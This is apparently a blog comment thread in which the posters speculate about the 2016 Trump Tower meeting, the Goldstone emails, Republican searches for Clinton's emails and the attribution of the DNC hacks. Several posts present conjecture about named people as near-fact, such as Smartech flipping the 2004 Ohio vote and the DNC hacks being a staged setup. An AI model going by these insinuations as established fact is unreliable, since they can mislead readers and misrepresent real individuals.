So Donald Trump Jr. is now openly admitting this meeting happened. But here’s what adds to the mystery: It’s not just Trump Jr.’s admissions to the press that are bringing us this story. There are five senior White House advisors who are anonymously acting as sources for this:
“What I suspect is the most important detail in this story is the sources. The Times reports that they got the information from “three advisers to the White House briefed on the meeting and two others with knowledge of it.” They apparently talked after the release of the first story. This is highly, highly significant. Needless to say, advisors to the White House are not in the business of taking highly damaging stories and volunteering new information which makes them catastrophically damaging. The only reason a President’s allies ever do something like that is either to get ahead of something much more damaging or get a first crack at shaping the public understanding of something much more damaging. There’s really no other explanation. We don’t know yet what drove them to volunteer such highly damaging information. Five of them did it. It wasn’t a matter of one person going rogue.”
Yep, we didn’t just see a pair of blockbuster reports come out over the weekend. We saw what appears to be a coordinated high-level White House public relations campaign. Some sort of limited hangout that appears to be intended to get ahead of something. What could that something be? Well, whatever it is it’s something worse than the story that Trump Jr. is now admitting to. And as Josh Marshall speculates, what we’re seeing might have less to do with the White House preemptively working to shape the narrative and instead have more to do with the rest of these White House advisors — who are, themselves, at risk of getting dragged into the legal morass that Trump Jr. is now clearly in — preemptively throwing Trump Jr. under the bus in the hopes of cushioning their own legal blows:
“These are all purely hypotheticals. It remains key that five people that the Times chose to call advisors to the White House talked to the Times. That’s a lot of people. But today I get the sense that the story is one I should have considered more fully yesterday: one of the biggest threats to the Trump White House is the kind of dingbat, spy v spy infighting and blood feuds we’ve observed already but likely only know the half of. In a normal White House this might just lead to lots of bad press and lack of esprit de corps. Reagan’s White House was a bit notorious for this. But when numerous advisors, in and outside the White House, are looking at profound legal jeopardy, the stakes get a lot higher”
Don’t forget: there could be any number of people looking at potential treason charges if the worst-case scenario really does pan out and the Trump team was knowingly taking anti-Hillary info from the Russian government. And once Jared Kushner revised his disclosure forms and revealed this meeting took place, the public discovery of this meeting was sort of a ticking time-bomb for the Trump team. It wasn’t a matter of if it got revealed but when. And, sure enough, we have this one-two punch of major stories coming from five White House advisors that’s putting Donald Trump Jr., Jared Kushner, and Paul Manafort at the top of the list of Trump team members who knowingly colluded with the Russian government. If these stories were an attempt to shape the narrative, it appears to be intended to shape it in a manner that limits the collusion blame to those three individuals.
So when we’re asking cui bono about this story, the biggest beneficiary is obviously Donald Trump himself. But with five advisors acting as sources for this story it’s a reminder that it could be a lot more than just Trump who’s trying to cover their ass at this point.
And there’s another interesting angle to all this: Remember the mystery of the Alfa bank server and its unexplained communications with a Trump-associated server? Well, it turns out that the first big spike in traffic between the servers started in mid-June, shortly after the June 9th meeting (see the screenshot of the traffic and how it spikes for the first time in Mid-June from the 10/31/2016 Slate article). So who knows if the Alfa bank server mystery is about to get reignited too.
All we know at this point is that Donald Trump Jr., Jared Kushner, and Paul Manafort appear to have been thrown under the bus by a group of White House insiders. And Don Jr. is helping to throw himself under the bus with tweets like this:
So Don Jr. is looking rather disposable at this point. Which makes sense since he’s not officially part of the Trump administration at this point and can presumably be trusted to deflect as much as he can away from his dad. Same with Jared. Sort of. Filling his shoes in the administration will be an interesting task if he leaves. But it’s looking like Trump’s son and son-in-law could be the next victims of #TrumpRussiaGate.
And in other news, Steve Bannon, a top advisor who wasn’t yet part of Trump’s team during the June 9th meeting, is now reportedly back in Trump’s good graces. Interesting timing...
Well, it’s looking like the #TrumpRussia investigation could be transitioning from “Did the Russian government attempt to help the Trump campaign?” to “How exactly did the Russian government attempt to help the Trump campaign?”: According to three people with knowledge of an email sent by Rob Goldstone — the talent agent who arranged the now notorious June 9th, 2016 meeting — the email specifically stated that the damaging information on Hillary Clinton that was to be provided at the meeting was coming from the Russian government and part of an attempt by the government to help Trump’s campaign. That was apparently in the opening email Goldstone sent to Trump Jr. And Trump Jr. decided to go to the meeting anyway. Along with Kushner and Manafort:
“Mr. Goldstone’s message, as described to The New York Times by the three people, indicates that the Russian government was the source of the potentially damaging information. It does not elaborate on the wider effort by Moscow to help the Trump campaign.”
So if that’s an accurate recounting of that email it would appear, at a minimum, that the Trump campaign was more than happy to knowingly collude with the Russian government. Which isn’t particularly surprising. What is surprising is that we now have three people, presumably people involved with the Trump campaign, who are telling reporters about it.
And perhaps even more surprising is the idea that someone who would appear to be working on behalf of a Russian intelligence operation would send an email to a Trump campaign official that basically says ‘this information is from the Russian government because it wants to help you guys’. Is that really the kind of information you should put in an email? Well, when you zoom out and look at the incredible list of inexplicably reckless or amateurish mistakes made across this entire affair — the inexplicably revealing hacking mistakes, the inexplicably bad cover for “Guccifer” as a ‘Romanian hacker’ who can’t even speak Romanian, the various clues left in the leaked document meta data — yes, sending an email saying “I’m working for the Russian government!” is in keeping with the general level of spycraft on display throughout this entire operation.
At the same time, notice how there’s no hint from any of these sources that this meeting in any way involved hacked DNC material:
So it’s still very possible that this meeting didn’t involve DNC hacks, although the timing was certainly suspicious.
But one of the questions raised by the timing specifically ties into one of the biggest mysteries of the DNC/Podesta hacks: the question of why the release of the hacked material was done in a manner that so strongly pointed the finger back towards Russia. Because even if you assume that the DNC hacks were indeed carried out by the Russian government, once you factor in that the Trump team was apparently having open meetings with Russian government operatives before the hacked emails were released to the public there’s a big question about who released those emails. Did the Trump team receive the emails and then release them under the guise of ‘Guccifer 2.0’, or was that really a Russian agent? And did the Trump team add all those ‘I’m a Russian!’ meta-data fingerprints to the documents or was that the work of the Russian hackers? And if it was the Russian government that added all these ‘I’m a Russian’ clues to the release of the hack, did they do that as part of the quid pro quo with the Trump team? Sort of a “we’ll take the blame, in exchange for [insert quo here]” arrangement?
In other words, while there’s generally been a dismissal of all the various ‘mistakes’ that were made by the alleged ‘Russian hackers’ that raise all sorts of questions about the nature of the hack, it’s important to remember that all these in-your-face ‘mistakes’, if intentionally done and if done by actual Russian hackers, point towards an even higher ‘price’ that the Trump team would have had to pay for such a service. Because as the media coverage of the 2016 hackings has amply demonstrated, there’s been almost no suspicions that the Trump team was directly involved in carrying out those hacks. It was concluded early on that it was the Russians and all those inexplicable ‘mistakes’ were key pieces of ‘evidence’ that it was indeed Russian hackers. If those ‘mistakes’ were intentional and this really was done by Russian government hackers, those ‘mistakes’ were pretty valuable to the Trump campaign. At least in the short run, during the campaign since the obvious other suspect for the hacks would have been the Trump campaign itself. So all those hacker ‘mistakes’ bought Trump some plausible deniability, albeit at the cost of charges of Russian collusion. Was that a ‘service’ being offered?
Of course, now that Trump is president, all those hacker ‘mistakes’ pointing towards Russian hackers have swamped his administration in a sea of investigations that could end up consuming his administration and personal empire. So if the Russian government really did do these hacks, and really did leave all these Russian ‘fingerprints’ intentionally as a kind of service to Trump, it’s hard to say that it was a service worth requesting. And given the long-term damage this whole affair could do to US-Russian relations it would be baffling if the Russian government ever considered taking the blame for such an operation even with the payout of a friendly Trump administration dangling in front of them. The cost-benefit ratio is just horrible, especially if Russia intentionally took the blame, which would inevitably hamper the ability of a friendly Trump administration to do things like easing sanctions.
Or did the Trump team receive a bunch of hacked emails and then themselves decide to distribute them in a manner that made it look like Russian hackers did it? That would also explain those hacker ‘mistakes’.
At this point, simply trying to figure out what kind of basic rationale was being employed by all of the various actors involved with the situation is becoming increasingly difficult as a story of increasingly unreasonable people and actions unfolds. What we know for sure is that three people with a close connection to this story are making sure this is a really, really big story right now. Is this all a setup for a big disappointment or the beginning of the end of the Trump administration? We’ll see.
@Pterrafractyl–
Note the role of CIA operative, and FBI informant, and convicted organized crime figure Felix Sater in brand Trumpo’s business ventures in Russia that ultimately led to the association with this group. Note, also, that Sater’s name was largely eclipsed in the discussion of Trump’s meeting with a Ukrainian lawyer to discuss lifting sanctions against Russia.
https://www.forbes.com/sites/chasewithorn/2017/03/20/inside-trumps-russia-connections-the-felon-and-the-pop-star/#3d8afe343a47
Best,
Dave
@Dave: Another part of what makes this such an amazing story is that the whole thing has the feel of an intelligence operation — getting the Trump team to do something incriminating for later leverage — but specifically a casual and routine intelligence operation involving putting out feelers to see if the Trump team would be stupid enough to reply to such an incriminating offer. Like it’s not even serious at first, but then became serious after Trump, Jr. took the bait. They didn’t need to reel him in. He jumped in the damn boat himself!
And the absurdity of the whole situation became much more transparent after a particularly ham-fisted attempt at damage control where Trump, Jr. decided to release what he says was the full email exchange with Rob Goldstone, the music publicist and acquaintance of Trump, Jr. who originally emailed Trump, Jr. about setting up the meeting. And, sure enough, those emails do provide some additional transparency about the situation. Very unsightly transparency: In the very first email to Trump Jr., Goldstone mentions how the “Crown prosecutor of Russia” wanted to help Trump. The very first email! It should have been immediately obvious that if Trump, Jr. responded to this inquiry with anything other than “No thanks” he was entering into potential Kompromat territory. But he took the bait. With glee. And the person who set the bait was Rob Goldstone, a Trump business partner/associate.
So we appear to have a Trump business partner setting the Trump team up for some sort of kompromat and the Trump team, at least Don Jr., never appears to have suspected a thing! It raises the question of just how many similar situations Felix Sater corralled the Trump team into along with questions of which government he was working for at the time. And the same question now applies to the rest of Trump’s international business associates. Because if this is how the Trump team normally reacts to such explosive inquiries from its business partners there must be political blackmail material on them all over the world:
““Emin just called and asking me to contact you with something very interesting,” Goldstone wrote. “The Crown prosecutor of Russia met with his father Aras this morning and in their meeting offered to provide the Trump campaign with some official documents and information that would incriminate Hillary and her dealings with Russia and would be very useful to your father.””
Yes, Goldstone straight up tells Trump, Jr. in an email that the top prosecutor in Russia agreed to help the Trump campaign with damaging information on Hillary Clinton (or at least implies that...there is no “Crown prosecutor of Russia”). And he also makes it clear that the lawyer Trump, Jr. would be meeting to get this damaging information is also a Russian government lawyer:
And Junior seems totally cool with all of this:
Those were just some of the gems in the emails Trump, Jr. released today. And all of this is apparently news to the FBI and Special Counsel’s office.
All in all, this whole thing almost looks more like an operation to get dirt on Trump as opposed to giving dirt to him. Although, who knows, maybe they gave Trump some dirt too. But since the form of damage control Trump, Jr. is employing at this point is to basically come out and say “yeah, we wanted to get this damaging info from the Russian government, but it didn’t pan out. So what’s the big deal?”, it’s worth noting that one of the many big deals is that the Trump team doesn’t seem capable of avoiding obvious self-incriminating situations.
@Pterrafractyl–
http://www.seattletimes.com/nation-world/how-the-miss-universe-pageant-led-to-trumps-son-meeting-with-a-russian-lawyer/
“. . . .Sater worked on a plan for a Trump Tower in Moscow as recently as the fall of 2015, but he said that had come to a halt because of Trump’s presidential campaign. . . .”
That was in the fall of 2015.
In January of this year, as indicated in the “Forbes” article I linked in an above comment, Sater is also in Ukraine with Michael Cohen, working with a Ukrainian oligarch to lift sanctions against Russia.
At least that’s what we are told.
CIA, FBI (informant), Mafia–Sater touches all the bases.
Best,
Dave
CNN has an article about a 2013 behind-the-scenes video taken during the Miss USA pageant in Las Vegas of Donald Trump meeting with three of the figures involved with the now notorious June 9th meeting with Donald Trump, Jr., Jared Kushner, and Paul Manafort. In the video, Trump, along with the lawyer Michael Cohen, is seen dining with Aras Agalarov, his son Emin, and Emin’s publicist Rob Goldstone. To a large extent there’s nothing particularly surprising about the video, but it’s certainly timely. Especially now that Aras Agalarov, the person who Goldstone claimed was in contact with Russia’s “Crown Prosecutor”, is denying ever making the offer and also denying even knowing Goldstone (they’re both seen together in the 2013 video). And while it’s pretty hard to believe that Aras doesn’t know his son’s publicist, the denials by Agalarov and his lawyer do raise a pretty good question that’s also raised by the 2013 video: given how chummy Trump and Agalarov appear to be (and they are quite chummy in the videos), why on Earth wouldn’t Agalarov just pick up the phone and call Trump directly with the offer of dirt on Hillary Clinton, as opposed to having Goldstone send a highly incriminating email?:
“Aras Agalarov told Russian radio station BFM that he doesn’t know Trump Jr. personally, though he acknowledges that they “did Miss Universe” together. But Agalarov told BFM that his son Emin Agalarov does know him. Agalarov told BFM he “doesn’t really know” publicist Rob Goldstone either and he says the notion that Goldstone asked Trump Jr. to contact him about some dirt on Hillary Clinton is a “tall tale””
So Agalarov is officially denying everything, even after Trump, Jr. just released the whole email chain. And those denials include even really knowing Goldstone. And while we can’t rule out the possibility that Goldstone really did just make up the claims about Agalarov’s offer, keep in mind that Aras’s son Emin is one of Goldstone’s clients so Goldstone presumably doesn’t want to piss off the Agalarovs (and Aras presumably knows who his son’s publicist is...especially when they’re in the same 2013 video).
Still, the question raised by Agalarov’s lawyer is a pretty good one: why didn’t Agalarov just contact Trump directly about such a sensitive matter?
It’s all quite weird, even by Trump-weirdness standards.
Also don’t forget that the June 9th meeting also involved Natalia Veselnitskaya — the Russian lawyer at the center of the now notorious June 9th meeting. So Veselnitskaya would be taking a pretty big risk if she was involved in such a scheme that implicated both Aras and the “Crown Prosecutor” in writing without their knowledge. Similarly, if she was offering “Russian government” help to Trump without at least someone relatively high up in the government approving such an action that also seems like an incredible risk. At the same time, doing what they did — having Rob Goldstone straight up say ‘the Russian government wants to help you with some dirt on Hillary’ in an email to Trump, Jr. — also seems like an incredible risk...for the Russian government to take. So none of this really makes sense.
But there’s a particularly amusing, and sad (‘Sad!’) contrast of projected power and influence that emerges from a piece by Leonid Bershidsky on how Veselnitskaya fits into the Russian power-structure. First, look how Trump describes the Agalarovs in the above CNN piece: As the most powerful people in Russia:
Well, it would appear Aras Agalarov doesn’t share such a high opinion of Donald Trump. Or at least Trump’s relative importance. Because as Bershidsky points out, there are ‘levels’ in the Russian power structure and people at higher ‘levels’ don’t really ‘deal’ with lower-level people. And as Aras Agalarov said of Trump in a recent interview, Trump just isn’t the kind of person that top-level Russians would even talk to, at least prior to becoming President. As Agalarov put it, “it’s one thing when he communicates with me. That’s, like, one level. But it’s a different matter for him to communicate with the president of the Russian Federation.” (Sad!):
“It was with the Agalarovs that Trump partnered for the 2013 Miss Universe pageant, held in Moscow. That’s how Goldstone, who arranged the presence of Trump and the contestants in an Emin Agalarov music video, knew Donald Jr. Emin, for his part, knew Veselnitskaya, queen of the regional courtrooms. Before he was elected, Trump’s level of communication in Russia was no higher than that of the Moscow Region’s elite, several notches below the Kremlin. Aras Agalarov said of Trump in a recent interview with the Russian daily Komsomolskaya Pravda.”
So Aras Agalarov did sort of lend support to Trump’s claims that he had never previously met Vladimir Putin. Maybe it’s true. Maybe Trump never had more than a few passing interactions with Putin...because Trump wasn’t important enough. He was too “low level” for Putin’s time and prestige. Very Sad!
Also note Bershidsky’s final take on the situation: that Veselnitskaya really did use her contacts to arrange for this meeting and really did basically bait the Trumps into a meeting promising dirt on Hillary simply to get a chance to lobby the Trump campaign about her pet issue, the Magnitsky Act:
But for Veselnitskaya to arrange all this on her own she would have needed to have been close to the “Crown prosecutor” (the prosecutor general of Russia) to get him on board with this. And Veselnitskaya is reportedly close to the prosecutor general. But if this really was a “lower-level” operation, all this would have had to have been done without Putin’s knowledge in the middle of a US presidential campaign where Trump’s ties to Russia were already a campaign issue. Would a “lower-level”, yet still relatively high-powered, Russian attorney, the Russian prosecutor general and an oligarch like Aras Agalarov engage in such a scheme on their own? It doesn’t seem like a likely scenario. But a high-level, Putin-directed operation like the one being described also doesn’t seem very likely simply because of how stupid it all is to write such an incriminating email and have goofballs like Rob Goldstone operating as the middleman.
But that’s where we are: every scenario we’re being asked to entertain is implausibly stupid. It’s one of the more unpleasant aspects of life in Trumplandia. We can’t even apply ‘Trump’s Razor’ anymore! Very Very Sad!
Here’s the latest twist on the various GOP efforts to search the dark web for someone who may have hacked Hillary Clinton’s private email server. Recall how GOP financier Peter Smith was running an operation involving Michael Flynn, Steve Bannon, and Kellyanne Conway to find Hillary’s emails. And recall how that operation ended up with them consulting with ‘Alt Right’ troll Charles Johnson and Guccifer 2.0, who both reportedly recommended they contact Andrew ‘weev’ Auernheimer in their pursuits. Also recall how Johnson said he “put the word out” to a “hidden oppo network” of other right-wing groups who were more or less trying to do the same thing.
Well, in this latest twist it looks like we may have stumbled across part of that “hidden oppo network”, although there’s no indication yet that this is actually part of the network Johnson was referring to: It turns out Barbara Ledeen, wife of Michael Ledeen, apparently decided to create her own operation back in 2015 while she was a GOP staffer for the Senate judiciary committee.
Ledeen claims she was solely motivated out of fears that Hillary’s hacked emails might put her children serving in the military at risk (that’s seriously her story). Of course, as we’ve seen before, her husband, Michael, was Michael Flynn’s co-author on their book The Field of Fight: How We Can Win the Global War Against Radical Islam, a book that argues the US is already in WWIII against radical Islam and that the US needs to wage a full-scale religious war in response. So in addition to Flynn’s alleged involvement in Peter Smith’s “hidden oppo” team, we have the wife of the co-author of Flynn’s book also running her own operation.
Who else was involved with Barbara Ledeen’s email-hunting team? So far, all we know is that she asked Newt Gingrich and “an unnamed defense contractor”. Gingrich apparently wanted to bring in some more people so he reached out to Judicial Watch who, in turn, brought in another unnamed contractor who is described as an expert on the dark web.
So it looks like we can add Barbara Ledeen, Newt Gingrich, Judicial Watch, and a pair of unnamed contractors to the list of people comprising a hidden oppo network, and perhaps the hidden oppo network Johnson was talking about.
But if that’s the case and this is the network Johnson was referring to, it’s a pretty remarkable coincidence that both of these networks could have been operating without knowing about each other given the closeness of Flynn and Michael Ledeen and the fact that Flynn and Ledeen’s book was published in July of 2016, implying that Flynn and Ledeen were in pretty close contact with each other in the period leading up to this.
At the same time, it’s important to note that we don’t know when Barbara Ledeen’s team stopped operating. We just know that it apparently started in 2015 according to the article below. So it’s possible the team ended its search before the Smith team started up in September of 2016. It’s one of the many significant facts we have yet to learn about this particular right-wing hacker-outreach effort:
“According to interview notes released by the FBI last year, Ledeen decided in 2015 to launch her own investigation into Clinton’s use of the server. At the time, she was a staffer on the Senate judiciary committee.”
So at some point in 2015, Barbara Ledeen decided to search the dark web for Hillary’s emails. Why? Because she wanted to see if a “foreign power” had hacked them and then thrown them up on the dark web, which might put her children in the military at risk. That’s her story:
But she needed money so she turned to Newt Gingrich and an unnamed defense contractor. And then Gingrich brought in Judicial Watch and another contractor who was familiar with the dark web. Then they all got concerned about what to do if they came across classified information and the project was later halted. That’s also her story:
Part of what’s so amusing about the ‘concerns’ over finding classified information in these emails is that that was the big prize: finding classified information in the hacked emails. ‘Putting classified information at risk’ was the charge constantly leveled against Hillary for setting up that private server, so such concerns would be like going on a treasure hunt and getting all concerned about finding the treasure. The only concern for them would have been concerns over how to best politically exploit such an amazing find.
But that’s her story. At least the story she told the FBI.
And then there’s the story coming out from the office of Chuck Grassley, the head of the Senate judiciary committee, distancing his committee from Ledeen: “Senator Grassley has no relationship with Barbara’s husband and wouldn’t recognise him if he saw him”:
Senator Grassley, someone who has been serving in the Senate for decades, apparently wouldn’t recognize one of the most influential – and controversial – players in conservative circles in Washington for decades. You have to wonder what’s prompting that kind of denial. There’s a distinct “he doth protest too much” feel to it.
So we have a Flynn-connected team going on to the dark web in 2015, and then a second Flynn-related team doing the same thing in September 2016. And don’t forget that “scouring the dark web for Hillary’s hacked emails” is a great cover story for “going on to the dark web to hire a hacker or coordinate with a sympathetic one who will do the hacking for free”. It raises the obvious question of whether or not these two hacker-outreach efforts were part of the same overall operation: have one team arrange for the hacks and a completely separate team contact the hacker later. A hacker like, oh, say, Andrew ‘weev’ Auernheimer? Maybe?
There’s a new BuzzFeed piece on the cyber forensic analyst, Robert Johnston, who led the Crowdstrike investigation into the DNC server hack that helps fill in some additional details about both the March 2016 hack allegedly carried out by APT28 (Fancy Bear) as well as the earlier 2015 hack attributed to APT29 (Cozy Bear).
One detail we hadn’t known before is how the FBI initially identified that the DNC’s server was hacked in September of 2015. The NSA informed the FBI of this. This is rather notable since it would suggest that the NSA determined the DNC’s server was hacked by watching traffic flowing from the DNC’s servers to the same command and control server that was used in the Pentagon hack. And that suggests that the FBI or NSA should have been able to see these data flows during that entire bizarre 7 month period (from September 2015 through March 2016) when the DNC was ignoring the FBI’s half-assed attempts to inform them of this hack.
Another important detail relates to both the APT29 and APT28 hacks. The 2015 hack presumed to be the work of the Russian FSB (APT29/Cozy Bear) took place some time around May 2015, the same month of the Bundestag hack. The report doesn’t indicate that the APT29 hack was part of the same wave that hit the Bundestag, but the timing is quite interesting.
Here’s where it gets extra interesting: according to Johnston, that May 2015 hack was part of a presumed Russian government hacking campaign that was rather unusual for Russian government hacking in general but not at all unusual for the DNC hacks. It was an extremely ‘noisy’ hack. Instead of the typical 5 or 6 carefully crafted phishing emails targeting a select set of individuals, the May 2015 hack hit 50,000–60,000 people. As Johnston put it, it was like the hackers didn’t care who saw them doing it. And Johnston should know, because that same wave of phishing attempts also hit the Pentagon and he was working for the cyber defense unit the Marine Corps had recently set up that responded to it.
Of course, part of what makes the conspicuous “I’m a Russian hacker! Watch me work!” nature of that May 2015 APT29 hacking campaign extra conspicuous is that, as we’ve seen before, a key piece of digital evidence that led to the attribution of the March 2016 hack to APT28/Fancy Bear was that the malware used in that hack included a hard coded IP address that was the same hard coded IP address found in the May 2015 Bundestag hack’s malware. And that IP address evidence is rather conspicuous evidence, both because it includes a hard coded IP address and because the server that IP address leads back to was running a vulnerable version of OpenSSL that could have allowed it to be hijacked via the Heartbleed attack. In other words, we already knew that the APT28/Fancy Bear hack was filled with conspicuous “I’m a Russian hacker!” digital evidence left behind. But now we know that the APT29 hack a year earlier also had that same “I’m a Russian hacker! Watch me work!” atypical characteristic:
“A political outsider who got the job essentially at random — the DNC literally called up CrowdStrike’s sales desk — Johnston was the lead investigator who determined the nature and scope of the hack, one he described less as a stealth burglary than as a brazen ransacking. Despite his central role, Johnston has never talked with investigators probing Russian interference, let alone with the media. But to people dealing with the crisis, “He was indispensable,” as a source close to the DNC put it.”
Less a stealth burglary and more a brazen ransacking. That was how Johnston described the DNC server hacks, which is consistent with how it’s been described before. Recall the characterization of the DNC hackers as behaving as if “Russia wanted to get caught”. But now we learn that the initial March 2015 hacks that hit tens of thousands of other targets around the world also had the ‘Russia wanted to get caught’ atypical characteristics:
“By “noisy,” he means that the attackers were drawing a huge amount of attention, sending out 50,000 phishing emails, as if they didn’t care that anyone knew what they were doing.”
It’s the latest indication that if the Russian government really was behind these hacks it wanted this whole thing to blow up in a mega-scandal which puts a hilarious twist on the apparent Russian government courtship of the Trump campaign. Team Trump thought they were partners in crime and were instead a bunch of wannabe criminal dupes getting set up for a massive embarrassment. That’s sure how it looks if these really were Russian government hackers.
And as Johnston also notes, it was the NSA who informed the FBI of the DNC APT29 hacks in the first place:
So that helps clarify the mystery of how the FBI determined the DNC was hacked in the first place, but just adds to the mystery of how that hack was allowed to continue for so long after the FBI and NSA learned this.
And with these revelations of the “I’m a Russian hacker! Watch me work!” nature of the APT29/Cozy Bear hacking campaign of May 2015, here’s another recent article that gives some more details on the March 2016 APT28/Fancy Bear hack and how security analysts attributed it to the Russian government. Much of this is information that’s been told before. But it also makes one thing clear about the conspicuous nature of these hacks: that conspicuous OpSec ‘oopsie’ where the hackers left the privacy setting on their Bit.ly accounts — recall Bit.ly was used in the phishing emails — set to “public” so anyone in the world could see who was getting targeted in their wave of phishing attacks was critical for establishing that these hackers were primarily interested in Democrats. It was the kind of ‘whoops!’ move that sent the message to the world “I’m a Russian hacker and I’m specifically interested in Democrats!”, which, again, is rather conspicuous:
“An Associated Press investigation into the digital break-ins that disrupted the U.S. presidential contest has sketched out an anatomy of the hack that led to months of damaging disclosures about the Democratic Party’s nominee. It wasn’t just a few aides that the hackers went after; it was an all-out blitz across the Democratic Party. They tried to compromise Clinton’s inner circle and more than 130 party employees, supporters and contractors.”
And note how this March 2016 APT28 phishing blitz against the Democrats was apparently so out in the open that it caught the attention of the FBI:
But it wasn’t just the FBI watching this. Secureworks, a cybersecurity subsidiary of Dell, was also tracking APT28’s hacking campaign. And it was able to see that it was heavily Democrats, instead of roughly equal numbers of Democrats and Republicans, who were being targeted, because APT28 made the incredible OpSec error of leaving its Bit.ly account open to the public:
“The group’s hackers seemed particularly interested in Democratic officials working on voter registration issues: Pratt Wiley, the DNC’s then-director of voter protection, had been targeted as far back as October 2015 and the hackers tried to pry open his inbox as many as 15 times over six months.”
And that, of course, is just one of the many “I’m a Russian hacker!” digital clues left behind in this hacking campaign. But it’s also an “I’m a Russian hacker and I’m particularly interested in Democrats instead of Republicans” conspicuously left digital clue.
But also note that Secureworks stumbled across this apparent OpSec mistake in March of 2016, the same month the mysterious Maltese professor and apparent Russian government proxy, Joseph Mifsud, began his outreach campaign to the Trump campaign. So if that digital clue was left intentionally and it was left by a real Russian government hacker, it’s the latest indication that these hackers were trying to make it very clear to the world that they were favoring the GOP over the Democrats, which is a remarkable clue to leave given the circumstances.
That said, let’s not forget that Guccifer 2.0 did actually release a small number of Republican emails. And they all appeared to be emails from accounts hosted by the notoriously shady GOP technology firm Smartech:
“While the nearly 300 Republican-related e‑mails posted on DC Leaks are uniformly innocuous, the collection is noteworthy for the scope of victims it reveals. The material includes correspondence lifted from the campaign committees of various elected officials, including Senator John McCain, Senator Lindsey Graham, and Representative Robert Hurt. Several state GOP organizations, Republican PACs, and campaign consultants also had their e‑mail accounts compromised.”
300 uniformly innocuous Republican emails. That was the extent of Guccifer’s leak of GOP emails. And they all appear to be emails that were sent from or to email addresses hosted by Smartech:
Was the release of a few hundred GOP emails an attempt by the hackers to seem ‘fair & balanced’? If so, it wasn’t much of an attempt. If anything, it was a conspicuously half-assed attempt.
And note the time frame of the GOP’s emails: four months ending in mid October 2015. It’s a rather odd timeframe if you think about it. July–October 2015? The APT29 wave of phishing attacks was in May 2015. Was Smartech allegedly hacked in that wave or was this a different hack? Perhaps someone should ask them about that.
But also note Smartech’s notorious history: That’s the firm long accused of flipping the Ohio result in the 2004 Presidential election! Yep, it turned out the Ohio Secretary of State’s office had its website hosted by Smartech. All the voting results were run through that site and, lo and behold, Ohio experienced an inexplicable shift from John Kerry to George W. Bush. So the 300 innocuous GOP emails were apparently hacked from the GOP’s tech firm that’s a prime suspect for hacking the 2004 election. Although it wasn’t the only GOP-connected firm involved in that investigation. Another firm, GovTech, was run by Karl Rove’s IT guru Mike Connell. And it was Connell who died in the mysterious small plane crash that happened right before he was to testify, after Connell said he feared for his life. THAT’s the kind of investigation that took place involving Smartech and the hacking of the 2004 election. It’s pretty notable in the current context:
“Fitrakis isn’t the only attorney involved in pursuing the truth in this matter. Cliff Arnebeck, the lead attorney in the King Lincoln case, exchanged emails with IT security expert Stephen Spoonamore. He asked Spoonamore whether or not SmarTech had the capability to “input data” and thus alter the results of Ohio’s 2004 election. His response sent a chill up my spine.”
Yeah, the answer to the question of whether or not Smartech had the capability to alter Ohio’s election results was indeed rather chilling:
Smartech appeared to be the “man in the middle” of a GOP vote-flipping operation that really could have altered the vote tabulation.
But it wasn’t the only GOP firm that was part of this operation:
THAT’s the background of Smartech, the ONLY GOP firm to apparently get hacked and have its email released. 300 innocuous emails.
So let’s review:
1. We have a shockingly “noisy” hacking campaign in May of 2015 that hits the DNC. A campaign seemingly designed to get the world pissed off at Russia for hacking them.
2. We have another shockingly “noisy” hacking campaign in March of 2016 that hits the DNC again, and this time the noisiness includes leaving the Bit.ly accounts open to the world so everyone could see that the hackers were focusing on Democrats but not just Democrats. That Bit.ly mistake also showed phishing targets that were filled with Putin’s adversaries around the globe. So it clearly sent the message of “I’m a Russian hacker!” but also, more subtly, “and I’m mostly just focused on Democrats in the US political arena!” That was the pair of conspicuous messages sent.
3. But emails released by Guccifer 2.0 did include 300 innocuous GOP emails. All from email accounts hosted by Smartech, one of the key GOP firms suspected of hacking the 2004 election.
4. We know that multiple teams of GOP operatives were searching for Hillary’s emails (teams led by Peter Smith, Barbara Ledeen, and the yet-to-be identified group Charles Johnson was in touch with), and we also know these are the types of people that would have been willing to get these emails under any circumstances, which raises the obvious possibility that these GOP teams were willing to carry out the hacks themselves (but would obviously want to redirect the blame elsewhere).
5. We know Joseph Mifsud, the mysterious Maltese professor, dangled the temptation of thousands of Hillary’s emails to the Trump team in what appeared to be a covert outreach attempt with the Trump campaign, but we also know that the GOP felt like they never really got what they were looking for, because Peter Smith’s team kept searching the Dark Web for ‘Russian hackers’ with Hillary’s 33,000 deleted private emails well into August of 2016, after the DNC emails were already released.
6. We know that the contact with Donald Trump, Jr. initiated by Rob Goldstone in early June that led to the Russian delegation Trump Tower meeting on June 9th included absurdly over-the-top incriminating details like sending Trump Jr. an email saying ‘the Russian government wants to help you’ that really doomed the Trump team during the subsequent investigations.
Taken all together, and given that we know the GOP was clearly very interested in hacking Hillary, and we know these hacking campaigns were filled with conspicuous “I’m a Russian hacker!” clues that were leading to the Russian government getting blamed for all these hacks, it raises a rather hilarious possibility: if the May 2015 hacking campaigns, including the high profile Bundestag hack that was blamed on Russia, weren’t carried out by the Russian government, the Russian government would surely know it’s being set up. Moscow is presumably following all the global hacking campaigns and attribution too. And don’t forget, Barbara Ledeen was apparently searching the Dark Web for hackers with Hillary’s emails in 2015, and if she stumbled across any Russian agents it might have been clear what the GOP was up to. And we have no idea when Ledeen’s Dark Web search ended, so if she was still searching for Hillary’s deleted personal emails in early 2016 and still reaching out to hackers in the Dark Web about this, it could have been obvious to Moscow what the GOP wanted and that they still didn’t have what they were looking for.
So is it possible that the outlandish Russian outreach campaign targeting the GOP was partly a preemptive defensive measure designed to let the GOP implicate itself in a hacking operation not carried out by Moscow but which Moscow assumed was going to be blamed on it? In other words, following the wave of revelations about Russian contacts with the Trump campaign and promises of Hillary’s emails, the general assumption is that the Russians must have been behind the actual hacks. But when you consider the “noise” the GOP was already sending about its interest in Hillary’s emails in 2015, and consider that the only GOP emails released were from Smartech, a firm already implicated in hacking the 2004 election, there’s no reason to exclude the possibility that other hackers actually carried out the hacks, the Russians knew this was happening, and decided to ensure that if they were going to take the blame they would share it with the GOP.
Is that a feasible possibility given all the facts at hand? Because it seems like it would be a really effective strategy if the Kremlin thought it was about to be set up. At least, effective against the Trump team.
Either way, shouldn’t someone be looking into whether or not Smartech was actually hacked? As opposed to Smartech providing those emails to “Guccifer 2.0” to give the thing a ‘fair & balanced’ feel? That seems like an important fact that hasn’t actually been remotely established in this whole mess.
